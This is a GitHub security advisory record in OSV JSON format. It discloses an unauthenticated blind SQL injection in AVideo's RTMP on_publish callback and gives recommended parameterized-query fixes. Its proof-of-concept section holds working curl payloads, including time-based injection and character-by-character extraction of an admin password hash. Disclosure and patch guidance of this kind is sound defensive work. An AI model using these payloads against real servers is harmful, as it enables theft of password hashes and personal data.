{"id":"GHSA-8p58-35c3-ccxx","summary":"AVideo has an Unauthenticated Blind SQL Injection in RTMP on_publish Callback via Stream Name Parameter","details":"## Summary\n\nThe RTMP `on_publish` callback at `plugin/Live/on_publish.php` is accessible without authentication. The `$_POST['name']` parameter (stream key) is interpolated directly into SQL queries in two locations — `LiveTransmitionHistory::getLatest()` and `LiveTransmition::keyExists()` — without parameterized binding or escaping. An unauthenticated attacker can exploit time-based blind SQL injection to extract all database contents including user password hashes, email addresses, and other sensitive data.\n\n## Details\n\n**Entry point:** `plugin/Live/on_publish.php` — no authentication, no IP allowlist, no origin verification.\n\n**Sanitization (insufficient):** Line 117 strips only `&` and `=` characters:\n```php\n// plugin/Live/on_publish.php:117\n$_POST['name'] = preg_replace(\"/[&=]/\", '', $_POST['name']);\n```\n\n**Injection point #1 — unconditional (no `p` parameter needed):**\n\nAt line 120, `$_POST['name']` is passed directly to `LiveTransmitionHistory::getLatest()`:\n```php\n// plugin/Live/on_publish.php:120\n$activeLive = LiveTransmitionHistory::getLatest($_POST['name'], $live_servers_id, ...);\n```\n\nInside `getLatest()`, the key is interpolated into a LIKE clause without escaping:\n```php\n// plugin/Live/Objects/LiveTransmitionHistory.php:494-495\nif (!empty($key)) {\n    $sql .= \" AND lth.`key` LIKE '{$key}%' \";\n}\n```\n\n**Injection point #2 — when `$_GET['p']` is provided:**\n\nAt line 146, `$_POST['name']` is passed to `LiveTransmition::keyExists()`:\n```php\n// plugin/Live/on_publish.php:146\n$obj-\u003erow = LiveTransmition::keyExists($_POST['name']);\n```\n\nInside `keyExists()`, `cleanUpKey()` is called (which only strips adaptive/playlist/sub suffixes — no SQL escaping), then the key is interpolated directly:\n```php\n// plugin/Live/Objects/LiveTransmition.php:298-303\n$key = Live::cleanUpKey($key);\n$sql = \"SELECT u.*, lt.*, lt.password as live_password FROM \" . static::getTableName() . \" lt \"\n        . \" LEFT JOIN users u ON u.id = users_id AND u.status='a' \"\n        . \" WHERE  `key` = '$key' ORDER BY lt.modified DESC, lt.id DESC LIMIT 1\";\n$res = sqlDAL::readSql($sql);\n```\n\n**Why `readSql()` provides no protection:** When called without format/values parameters (as in both cases above), `sqlDAL::readSql()` passes the full SQL string — with the injection payload already embedded — to `$global['mysqli']-\u003eprepare()`. Since there are no placeholders (`?`) and no bound parameters, `prepare()` simply compiles the injected SQL as-is. The `eval_mysql_bind()` function returns `true` immediately when formats/values are empty.\n\n## PoC\n\n**Injection point #1 (unconditional — simplest):**\n\n```bash\n# Time-based blind SQLi via getLatest() — no p parameter needed\ncurl -s -o /dev/null -w \"%{time_total}\" \\\n  -X POST \"http://TARGET/plugin/Live/on_publish.php\" \\\n  -d \"tcurl=rtmp://localhost/live&name=' OR (SELECT SLEEP(5)) %23\"\n```\n\nA ~5-second response time confirms injection. The payload:\n- Avoids `&` and `=` (stripped by line 117)\n- Avoids `_` and `-` in positions where `cleanUpKey()` would split\n- Uses `%23` (`#`) to comment out the trailing `%'`\n\n**Data extraction — character-by-character:**\n\n```bash\n# Extract first character of admin password hash\ncurl -s -o /dev/null -w \"%{time_total}\" \\\n  -X POST \"http://TARGET/plugin/Live/on_publish.php\" \\\n  -d \"tcurl=rtmp://localhost/live&name=' OR (SELECT SLEEP(5) FROM users WHERE id=1 AND SUBSTRING(password,1,1)='\\\\$') %23\"\n```\n\n**Injection point #2 (via keyExists):**\n\n```bash\ncurl -s -o /dev/null -w \"%{time_total}\" \\\n  -X POST \"http://TARGET/plugin/Live/on_publish.php\" \\\n  -d \"tcurl=rtmp://localhost/live?p=test&name=' OR (SELECT SLEEP(5)) %23\"\n```\n\nThis reaches `keyExists()` at line 146, producing:\n```sql\nSELECT u.*, lt.*, lt.password as live_password FROM live_transmitions lt\nLEFT JOIN users u ON u.id = users_id AND u.status='a'\nWHERE `key` = '' OR (SELECT SLEEP(5)) #' ORDER BY lt.modified DESC, lt.id DESC LIMIT 1\n```\n\n## Impact\n\nAn unauthenticated remote attacker can:\n\n1. **Extract all database contents** via time-based blind SQL injection, including:\n   - User password hashes (bcrypt)\n   - Email addresses and personal information\n   - API keys, session tokens, and live stream passwords\n   - Site configuration and secrets stored in database tables\n\n2. **Authenticate as any user to the streaming system** — extracted password hashes can be used directly as the `$_GET['p']` parameter since `on_publish.php:153` compares `$_GET['p'] === $user-\u003egetPassword()` against the raw stored hash, allowing the attacker to start streams impersonating any user.\n\n3. **Enumerate database structure** — the injection can be used to query `information_schema` tables, mapping the entire database for further exploitation.\n\nThe first injection point (via `getLatest()`) is reached unconditionally on every request — no additional parameters beyond `name` and `tcurl` are required.\n\n## Recommended Fix\n\nUse parameterized queries in both affected functions:\n\n**Fix `LiveTransmition::keyExists()` at `plugin/Live/Objects/LiveTransmition.php:298-303`:**\n```php\n$key = Live::cleanUpKey($key);\n$sql = \"SELECT u.*, lt.*, lt.password as live_password FROM \" . static::getTableName() . \" lt \"\n        . \" LEFT JOIN users u ON u.id = users_id AND u.status='a' \"\n        . \" WHERE  `key` = ? ORDER BY lt.modified DESC, lt.id DESC LIMIT 1\";\n$res = sqlDAL::readSql($sql, \"s\", [$key]);\n```\n\n**Fix `LiveTransmitionHistory::getLatest()` at `plugin/Live/Objects/LiveTransmitionHistory.php:494-495`:**\n```php\nif (!empty($key)) {\n    $sql .= \" AND lth.`key` LIKE ? \";\n    $formats .= \"s\";\n    $values[] = $key . '%';\n}\n```\n\n**Fix `LiveTransmitionHistory::getLatestFromKey()` at `plugin/Live/Objects/LiveTransmitionHistory.php:681-688`:**\n```php\nif(!$strict){\n    $parts = Live::getLiveParametersFromKey($key);\n    $key = $parts['cleanKey'];\n    $sql .= \" `key` LIKE ? \";\n    $formats = \"s\";\n    $values = [$key . '%'];\n}else{\n    $sql .= \" `key` = ? \";\n    $formats = \"s\";\n    $values = [$key];\n}\n```\n\nAll three fixes use the existing `sqlDAL::readSql()` parameterized binding support (`\"s\"` format for string, values array) which is already used elsewhere in the codebase.","aliases":["CVE-2026-33485"],"modified":"2026-03-25T19:48:32.883100Z","published":"2026-03-20T20:47:19Z","database_specific":{"cwe_ids":["CWE-89"],"severity":"HIGH","github_reviewed":true,"github_reviewed_at":"2026-03-20T20:47:19Z","nvd_published_at":"2026-03-23T15:16:34Z"},"references":[{"type":"WEB","url":"https://github.com/WWBN/AVideo/security/advisories/GHSA-8p58-35c3-ccxx"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33485"},{"type":"WEB","url":"https://github.com/WWBN/AVideo/commit/af59eade82de645b20183cc3d74467a7eac76549"},{"type":"PACKAGE","url":"https://github.com/WWBN/AVideo"}],"affected":[{"package":{"name":"wwbn/avideo","ecosystem":"Packagist","purl":"pkg:composer/wwbn/avideo"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"last_affected":"26.0"}]}],"versions":["10.4","10.8","11","11.1","11.1.1","11.5","11.6","12.4","14.3","14.3.1","14.4","18.0","21.0","22.0","24.0","25.0","26.0"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-8p58-35c3-ccxx/GHSA-8p58-35c3-ccxx.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}]}